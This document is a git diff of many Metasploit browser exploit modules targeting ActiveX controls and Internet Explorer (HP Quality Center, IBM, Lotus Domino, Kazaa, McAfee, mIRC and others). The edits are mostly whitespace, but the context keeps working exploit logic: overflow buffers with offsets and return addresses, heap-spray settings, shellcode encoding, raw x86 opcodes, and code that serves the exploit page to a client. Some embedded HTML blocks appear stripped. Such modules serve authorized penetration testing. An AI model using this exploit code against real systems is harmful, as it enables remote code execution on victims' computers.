PocoNet.dll ], 'DisclosureDate' => 'Dec 25 2007', 'DefaultTarget' => 0)) 
@@ -70,27 +69,26 @@ class Metasploit3 < Msf::Exploit::Remote # Randomize some things vname = rand_text_alpha(rand(100) + 1) strname = rand_text_alpha(rand(100) + 1) - - # Set the exploit buffer + + # Set the exploit buffer sploit = rand_text_alpha(target['Offset']) + [target.ret].pack('V') - sploit << p.encoded + rand_text_alpha(1024 - p.encoded.length) + sploit << p.encoded + rand_text_alpha(1024 - p.encoded.length) # Build out the message - content = %Q| - - - - - | - + content = %Q| + + + +| + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/hpmqc_progcolor.rb b/modules/exploits/windows/browser/hpmqc_progcolor.rb index fcb17a18f7..192214e490 100644 --- a/modules/exploits/windows/browser/hpmqc_progcolor.rb +++ b/modules/exploits/windows/browser/hpmqc_progcolor.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -7,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking 
@@ -17,17 +20,17 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow', 'Description' => %q{ - This module exploits a stack-based buffer overflow in SPIDERLib.Loader - ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) - for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and + This module exploits a stack-based buffer overflow in SPIDERLib.Loader + ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) + for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32. - By setting an overly long value to 'ProgColor', an attacker can overrun + By setting an overly long value to 'ProgColor', an attacker can overrun a buffer and execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Trancer ' ], + 'Author' => [ 'Trancer ' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-1819' ], [ 'OSVDB', '34317'], @@ -41,13 +44,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 1024, - 'BadChars' => "\x00\x09\x0a\x0d'\\", + 'BadChars' => "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 64, 'Ret' => 0x0C0C0C0C } ] + [ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 64, 'Ret' => 0x0C0C0C0C } ] ], 'DisclosureDate' => 'Apr 4 2007', 'DefaultTarget' => 0)) 
@@ -72,12 +75,12 @@ class Metasploit3 < Msf::Exploit::Remote nops = Rex::Text.to_unescape([target.ret].pack('V')) ret = Rex::Text.uri_encode([target.ret].pack('L')) blocksize = 0x40000 - fillto = 500 + fillto = 500 offset = target['Offset'] - + # Randomize the javascript variable names mqcontrol = rand_text_alpha(rand(100) + 1) - j_shellcode = rand_text_alpha(rand(100) + 1) + j_shellcode = rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_headersize = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) @@ -88,34 +91,31 @@ class Metasploit3 < Msf::Exploit::Remote j_ret = rand_text_alpha(rand(100) + 1) # Build out the message - content = %Q| - - - - - | + content = %Q| + + + +| - - print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb index f83794db0f..c6be67a197 100644 --- a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb +++ b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/projects/Framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## require 'msf/core' 
@@ -17,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'IBM Access Support ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in IBM Access Support. When - sending an overly long string to the GetXMLValue() method of IbmEgath.dll - (3.20.284.0) an attacker may be able to execute arbitrary code. + sending an overly long string to the GetXMLValue() method of IbmEgath.dll + (3.20.284.0) an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2009-0215' ], [ 'OSVDB', '52958' ], @@ -41,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] ], 'DisclosureDate' => 'Mar 24 2009', 'DefaultTarget' => 0)) @@ -61,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - + ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or cl,[edx]").encode_string * 2) fill = rand_text_english(rand(12) + 1) @@ -87,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote opts = { 'Strings' => true, 'Symbols' => { - 'Variables' => [ + 'Variables' => [ 'vulnerable', 'shellcode', 'my_unescape', @@ -100,21 +104,20 @@ class Metasploit3 < Msf::Exploit::Remote js = ::Rex::Exploitation::ObfuscateJS.new(js, opts) js.update_opts(js_heap_spray.opts) js.obfuscate() - content = %Q| - - - - - - | + content = %Q| + + + + +| print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end 
diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
index dec5384cc3..792a16b42e 100644
--- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
+++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
@@ -1,3 +1,6 @@
+##
+# $Id$
+##
 ##
 # This file is part of the Metasploit Framework and may be subject to
@@ -8,7 +11,6 @@
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
@@ -18,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'IBM Lotus Domino Web Access Upload Module Buffer Overflow',
 'Description' => %q{
- This module exploits a stack overflow in IBM Lotus Domino Web Access Upload Module.
- By sending an overly long string to the "General_ServerName()" property located
- in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute
- arbitrary code.
+ This module exploits a stack overflow in IBM Lotus Domino Web Access Upload Module.
+ By sending an overly long string to the "General_ServerName()" property located
+ in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute
+ arbitrary code.
 },
 'License' => MSF_LICENSE,
- 'Author' => [ 'Elazar Broad ' ],
+ 'Author' => [ 'Elazar Broad ' ],
 'Version' => '$Revision$',
- 'References' =>
+ 'References' =>
 [
 [ 'CVE', '2007-4474' ],
 [ 'OSVDB', '40954' ],
@@ -46,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'Platform' => 'win',
 'Targets' =>
 [
- [ 'Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English', { 'Ret' => 0x0C0C0C0C } ]
+ [ 'Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English', { 'Ret' => 0x0C0C0C0C } ]
 ],
 'DisclosureDate' => 'Dec 20 2007',
 'DefaultTarget' => 0))
@@ -72,12 +74,12 @@ class Metasploit3 < Msf::Exploit::Remote
 junk = Rex::Text.to_unescape(rand_text_alpha(2))
 ret = Rex::Text.to_unescape([target.ret].pack('V'))
 blocksize = 0x30000
- fillto = 400
+ fillto = 400
 # Randomize the javascript variable names
 dwa7w = rand_text_alpha(rand(100) + 1)
- inotes6 = rand_text_alpha(rand(100) + 1)
- j_shellcode = rand_text_alpha(rand(100) + 1)
+ inotes6 = rand_text_alpha(rand(100) + 1)
+ j_shellcode = rand_text_alpha(rand(100) + 1)
 j_nops = rand_text_alpha(rand(100) + 1)
 j_headersize = rand_text_alpha(rand(100) + 1)
 j_slackspace = rand_text_alpha(rand(100) + 1)
@@ -87,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
 j_counter = rand_text_alpha(rand(30) + 2)
 j_ret = rand_text_alpha(rand(100) + 1)
 j_junk = rand_text_alpha(rand(100) + 1)
-
+
 # Build out the message
 content = %Q|
@@ -121,13 +123,13 @@ class Metasploit3 < Msf::Exploit::Remote
 |
-
-
+
+
 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
 # Transmit the response to the client
 send_response_html(cli, content)
-
+
 # Handle the payload
 handler(cli)
 end
diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb
index 43f7508824..cc05d37d9a 100644
--- a/modules/exploits/windows/browser/ie_createobject.rb
+++ b/modules/exploits/windows/browser/ie_createobject.rb
@@ -3,16 +3,14 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking
@@ -29,10 +27,10 @@ class Metasploit3 < Msf::Exploit::Remote
 # exploits. Make sure service packs on top of 6.0 are considered less
 # than the max by setting to 6.1 (which doesn't really exist).
 :ua_maxver => "6.1",
- :javascript => true,
+ :javascript => true,
 :os_name => OperatingSystems::WINDOWS,
 :vuln_test => 'CreateObject',
- :classid =>
+ :classid =>
 [
 '{BD96C556-65A3-11D0-983A-00C04FC29E36}',
 '{BD96C556-65A3-11D0-983A-00C04FC29E30}',
@@ -43,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
 '{639F725F-1B2D-4831-A9FD-874847682010}',
 '{BA018599-1DB3-44f9-83B4-461454C84BF8}',
 '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
- '{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
+ '{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
 '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
 '{0006F033-0000-0000-C000-000000000046}',
 '{0006F03A-0000-0000-C000-000000000046}',
@@ -55,16 +53,16 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Internet Explorer COM CreateObject Code Execution',
 'Description' => %q{
- This module exploits a generic code execution vulnerability in Internet
- Explorer by abusing vulnerable ActiveX objects.
+ This module exploits a generic code execution vulnerability in Internet
+ Explorer by abusing vulnerable ActiveX objects.
 },
 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'hdm',
+ 'Author' =>
+ [
+ 'hdm',
 ],
 'Version' => '$Revision$',
- 'References' =>
+ 'References' =>
 [
 # MDAC
 [ 'MSB', 'MS06-014' ],
@@ -102,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ], [ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ], [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ], - [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ], + [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ], # # The controls below can launch the "installing component" dialogs... @@ -116,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote # Found exploitable in the wild (no details) [ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ], - + ], 'DefaultTarget' => 0)) end @@ -138,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote var_func_createo = rand_text_alpha(rand(30)+2); var_exe_name = rand_text_alpha(rand(30)+2); var_objects = '' - + # Build the object list based on target selection if (target.name == 'Automatic') targets.each do |t| @@ -148,21 +146,21 @@ class Metasploit3 < Msf::Exploit::Remote else var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + "," end - - + + content = %Q^ - - #{var_html} - - + + + +#{var_html} + + | content = Rex::Text.randomize_space(content) - # Insert the shellcode + # Insert the shellcode content.gsub!('__pattern__', pattern) - + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload - handler(cli) + handler(cli) end end diff --git a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb index 4a55ad5aac..a9a40dae37 100644 --- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb +++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb 
@@ -210,29 +210,28 @@ class Metasploit3 < Msf::Exploit::Remote #clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93' clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' html = %Q| - - Please wait... - - +Please wait... + + | elsif (request.uri =~ /\.htm/i) @@ -240,19 +239,18 @@ class Metasploit3 < Msf::Exploit::Remote clsids = [ '8AD9C840-044E-11D1-B3E9-00805F499D93', 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' ] clsid = clsids[rand(clsids.length)] html = %Q| - - Please wait... - - - - - - +Please wait... + + + + + + | else @@ -263,15 +261,15 @@ class Metasploit3 < Msf::Exploit::Remote no_js_uri = rand_text_alphanumeric(8+rand(8)) + ".htm" html = %Q| - - - - - Please wait... - - + + + + +Please wait... + + | # end of detection html diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb index d5ad06e12b..b2f380cb46 100644 --- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb +++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -22,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Kazaa Altnet Download Manager ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the Altnet Download Manager ActiveX - Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7. - By sending a overly long string to the "Install()" method, an attacker may be - able to execute arbitrary code. + Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7. + By sending a overly long string to the "Install()" method, an attacker may be + able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-5217' ], [ 'OSVDB', '37785' ], 
@@ -47,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'Platform' => 'win',
 'Targets' =>
 [
- [ 'Windows XP SP0-SP2 / IE 6.0SP1 English', { 'Ret' => '\x0c\x0c\x0c\x0c' } ]
+ [ 'Windows XP SP0-SP2 / IE 6.0SP1 English', { 'Ret' => '\x0c\x0c\x0c\x0c' } ]
 ],
 'DisclosureDate' => 'Oct 3 2007',
 'DefaultTarget' => 0))
@@ -105,12 +104,12 @@ class Metasploit3 < Msf::Exploit::Remote
 ""
 content = Rex::Text.randomize_space(content)
-
+
 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
 # Transmit the response to the client
 send_response_html(cli, content)
-
+
 # Handle the payload
 handler(cli)
 end
diff --git a/modules/exploits/windows/browser/logitechvideocall_start.rb b/modules/exploits/windows/browser/logitechvideocall_start.rb
index 0c66da9c5b..8f8f3e1198 100644
--- a/modules/exploits/windows/browser/logitechvideocall_start.rb
+++ b/modules/exploits/windows/browser/logitechvideocall_start.rb
@@ -11,7 +11,6 @@
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
@@ -22,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote
 'Name' => 'Logitech VideoCall ActiveX Control Buffer Overflow',
 'Description' => %q{
 This module exploits a stack overflow in the Logitech VideoCall ActiveX
- Control (wcamxmp.dll 2.0.3470.448). By sending a overly long string to the
- "Start()" method, an attacker may be able to execute arbitrary code.
+ Control (wcamxmp.dll 2.0.3470.448). By sending a overly long string to the
+ "Start()" method, an attacker may be able to execute arbitrary code.
 },
 'License' => MSF_LICENSE,
- 'Author' => [ 'MC' ],
+ 'Author' => [ 'MC' ],
 'Version' => '$Revision$',
- 'References' =>
+ 'References' =>
 [
 [ 'CVE', '2007-2918' ],
 [ 'OSVDB', '36820'],
@@ -68,10 +67,10 @@ class Metasploit3 < Msf::Exploit::Remote
 # Randomize some things
 vname = rand_text_alpha(rand(100) + 1)
 strname = rand_text_alpha(rand(100) + 1)
-
- # Set the exploit buffer
- sploit = rand_text_alpha(target['Offset']) + [target.ret].pack('V') + p.encoded
-
+
+ # Set the exploit buffer
+ sploit = rand_text_alpha(target['Offset']) + [target.ret].pack('V') + p.encoded
+
 # Build out the message
 content = %Q|
@@ -79,16 +78,16 @@ class Metasploit3 < Msf::Exploit::Remote
- |
-
+ |
+
 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
 # Transmit the response to the client
 send_response_html(cli, content)
-
+
 # Handle the payload
 handler(cli)
 end
diff --git a/modules/exploits/windows/browser/lpviewer_url.rb b/modules/exploits/windows/browser/lpviewer_url.rb
index 9590a3faec..4060638a5d 100644
--- a/modules/exploits/windows/browser/lpviewer_url.rb
+++ b/modules/exploits/windows/browser/lpviewer_url.rb
@@ -1,13 +1,16 @@
-###
-## This file is part of the Metasploit Framework and may be subject to
-## redistribution and commercial restrictions. Please see the Metasploit
-## Framework web site for more information on licensing and terms of use.
-## http://metasploit.com/framework/
-###
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
@@ -17,13 +20,13 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow',
 'Description' => %q{
- This module exploits a stack overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When
- sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.
+ This module exploits a stack overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When
+ sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.
 },
 'License' => MSF_LICENSE,
- 'Author' => [ 'MC' ],
+ 'Author' => [ 'MC' ],
 'Version' => '$Revision$',
- 'References' =>
+ 'References' =>
 [
 [ 'CVE', '2008-4384' ],
 [ 'OSVDB', '48946' ],
@@ -42,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'Platform' => 'win',
 'Targets' =>
 [
- [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0C0C0C0C } ]
+ [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0C0C0C0C } ]
 ],
 'DisclosureDate' => 'Oct 6 2008',
 'DefaultTarget' => 0))
@@ -62,10 +65,10 @@ class Metasploit3 < Msf::Exploit::Remote
 # Encode the shellcode.
 shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-
- # Create some nops.
+
+ # Create some nops.
 nops = Rex::Text.to_unescape(make_nops(4))
-
+
 # Set the return.
 ret = Rex::Text.uri_encode([target.ret].pack('L'))
@@ -112,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
 # Transmit the response to the client
 send_response_html(cli, content)
-
+
 # Handle the payload
 handler(cli)
 end
diff --git a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb
index f9345fcc84..b34234bf5f 100644
--- a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb
+++ b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb
@@ -11,7 +11,6 @@
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
@@ -22,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote
 'Name' => 'Macrovision InstallShield Update Service Buffer Overflow',
 'Description' => %q{
 This module exploits a stack overflow in Macrovision InstallShield Update
- Service(Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to
- the DownloadAndExecute method, an attacker may be able to execute arbitrary code.
+ Service(Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to
+ the DownloadAndExecute method, an attacker may be able to execute arbitrary code.
 },
 'License' => MSF_LICENSE,
- 'Author' => [ 'MC' ],
+ 'Author' => [ 'MC' ],
 'Version' => '$Revision$',
- 'References' =>
+ 'References' =>
 [
 [ 'CVE', '2007-5660' ],
 [ 'OSVDB', '38347' ],
@@ -69,12 +68,12 @@ class Metasploit3 < Msf::Exploit::Remote
 # Randomize some things
 vname = rand_text_alpha(rand(100) + 1)
 strname = rand_text_alpha(rand(100) + 1)
-
- # Set the exploit buffer
+
+ # Set the exploit buffer
 sploit = rand_text_alpha(target['Offset'])
- sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
+ sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
 sploit << p.encoded + rand_text_alpha(1200 - p.encoded.length)
-
+
 #[id(0x00000007), helpstring("method DownloadAndExecute")]
 #void DownloadAndExecute(
 # BSTR dispname,
@@ -92,13 +91,13 @@ class Metasploit3 < Msf::Exploit::Remote
 #{vname}.DownloadAndExecute("", #{strname}, 0, "", "");
- |
-
+ |
+
 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
 # Transmit the response to the client
 send_response_html(cli, content)
-
+
 # Handle the payload
 handler(cli)
 end
diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb
index 44a5046fe3..d821837fba 100644
--- a/modules/exploits/windows/browser/macrovision_unsafe.rb
+++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -1,14 +1,16 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking @@ -18,12 +20,12 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Macrovision InstallShield Update Service ActiveX Unsafe Method', 'Description' => %q{ - This module allows attackers to execute code via an unsafe methods in Macrovision InstallShield 2008. + This module allows attackers to execute code via an unsafe methods in Macrovision InstallShield 2008. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-5660' ], [ 'OSVDB', '38347' ], @@ -67,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote vname = rand_text_alpha(rand(100) + 1) exe = rand_text_alpha(rand(20) + 1) - + content = %Q| | @@ -84,9 +86,9 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, content) - + handler(cli) - + end end diff --git a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb index b1c03a0763..76133c550d 100644 --- a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb +++ b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb 
@@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -22,18 +20,18 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'McAfee Subscription Manager Stack Overflow', 'Description' => %q{ - This module exploits a flaw in the McAfee Subscription Manager ActiveX control. + This module exploits a flaw in the McAfee Subscription Manager ActiveX control. Due to an unsafe use of vsprintf, it is possible to trigger a stack overflow by passing a large string to one of the COM-exposed routines, such as IsAppExpired. This vulnerability was discovered by Karl Lynn of eEye. }, 'License' => MSF_LICENSE, - 'Author' => - [ - 'skape', + 'Author' => + [ + 'skape', ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2006-3961'], [ 'OSVDB', '27698'], @@ -58,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Windows XP SP0/SP1', { 'Platform' => 'win', - 'Rets' => + 'Rets' => [ 0x7605122f, # XP SP0/SP1 shell32.dll: jmp esp #0x773f346a # XP SP2 comctl32.dll: jmp esp @@ -85,9 +83,9 @@ class Metasploit3 < Msf::Exploit::Remote end # Build out our overflow buffer - buf = + buf = rand_text(2972, payload_badchars) + - [ ret ].pack('V') + + [ ret ].pack('V') + "\x60" + # pusha "\x6a" + rand_char + # push byte 0x1 "\x6a" + rand_char + # push byte 0x1 
@@ -100,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote strname = rand_text_alpha(rand(100) + 1) # Build out the message - content = + content = "" + "" + " - | - + | + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/mirc_irc_url.rb b/modules/exploits/windows/browser/mirc_irc_url.rb index c6273daa0c..29b5cf49a9 100644 --- a/modules/exploits/windows/browser/mirc_irc_url.rb +++ b/modules/exploits/windows/browser/mirc_irc_url.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -23,15 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'mIRC IRC URL Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in mIRC 6.1. By + This module exploits a stack overflow in mIRC 6.1. By submitting an overly long and specially crafted URL to - the 'irc' protocol, an attacker can overwrite the buffer + the 'irc' protocol, an attacker can overwrite the buffer and control program execution. }, 'License' => MSF_LICENSE, - 'Author' => 'MC', + 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2003-1336'], [ 'OSVDB', '2665'], @@ -75,9 +73,9 @@ class Metasploit3 < Msf::Exploit::Remote # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload - handler(cli) + handler(cli) end end 
diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb index 38fd167a31..7aed6bf1d0 100644 --- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb +++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -22,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, - :javascript => false, + :javascript => false, :os_name => OperatingSystems::WINDOWS, :vuln_test => nil, # no way to test without just trying it :prefix_html => "Open Playlist + An attacker must send the file to victim and the victim must open the file. File-->Open Playlist }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancek ' ], @@ -37,11 +37,11 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 800, 'BadChars' => "\x00\x0a\x0d\x3c\x22\x3e\x3d", - 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, + 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 